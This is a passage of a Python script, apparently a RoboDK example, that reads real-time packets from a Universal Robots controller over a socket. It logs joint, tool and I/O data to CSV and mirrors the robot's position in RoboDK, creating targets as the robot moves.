UR_GET_JOINT_CURRENTS) #print(ROBOT_JOINTS) # Record once every 5 packets (125/5=25 Hz) if SAVE_CSV_FILE: if packet_id % 5 == 0: fid.write(str(toc())) # Write time stamp in seconds fid.write(',%.6f' % norm(ROBOT_TCP_SPEED[0:3])) # Position speed fid.write(',%.6f' % norm(ROBOT_TCP_SPEED[3:6])) # Orientation speed for value in ROBOT_JOINTS: fid.write(',%.6f' % value) for value in ROBOT_TCP_XYZUVW: fid.write(',%.6f' % value) for value in ROBOT_TCP_SPEED: fid.write(',%.6f' % value) fid.write(',' + ROBOT_INPUTS) fid.write(',' + ROBOT_OUTPUTS) fid.write('\n') # Monitor thread to retrieve information from the robot def UR_Monitor(): while True: print("Connecting to robot %s -> %s:%i" % (robotname, ROBOT_IP, ROBOT_PORT)) rt_socket = socket.create_connection((ROBOT_IP, ROBOT_PORT)) print("Connected") buf = b'' packet_count = 0 packet_time_last = time.time() while True: more = rt_socket.recv(4096) if more: buf = buf + more if packet_check(buf): packet_len = packet_size(buf) packet, buf = buf[:packet_len], buf[packet_len:] on_packet(packet, packet_count) packet_count += 1 if packet_count % 250 == 0: t_now = time.time() msg = "Monitoring %s at %.1f packets per second" % (robotname, packet_count / (t_now - packet_time_last)) print(msg) RDK.ShowMessage(msg, False) packet_count = 0 packet_time_last = t_now rt_socket.close() ROBOT_JOINTS = None last_joints_target = None last_joints_refresh = None # Start the Robot Monitor thread #q = queue.Queue() t = threading.Thread(target=UR_Monitor) t.daemon = True t.start() #UR_Monitor() # Start the main loop to refresh RoboDK and create targets/programs automatically target_count = 0 while True: # Wait for a valid robot joints reading if ROBOT_JOINTS is None: continue # Set the robot to that position if Robot_Joints_Check(last_joints_refresh, ROBOT_JOINTS, TOLERANCE_JOINTS_REFRESH): last_joints_refresh = ROBOT_JOINTS robot.setJoints(ROBOT_JOINTS) # Stop here if we need only the current position if RETRIEVE_JOINTS_ONCE: quit(0) # Check if the robot has moved enough to create a new target if CREATE_TARGETS and Robot_Joints_Check(last_joints_target, ROBOT_JOINTS, TOLERANCE_JOINTS_NEWTARGET): last_joints_target = ROBOT_JOINTS target_count = target_count + 1 newtarget = RDK.AddTarget('T %i' % target_count, 0, robot) # Take a short break pause(REFRESH_RATE)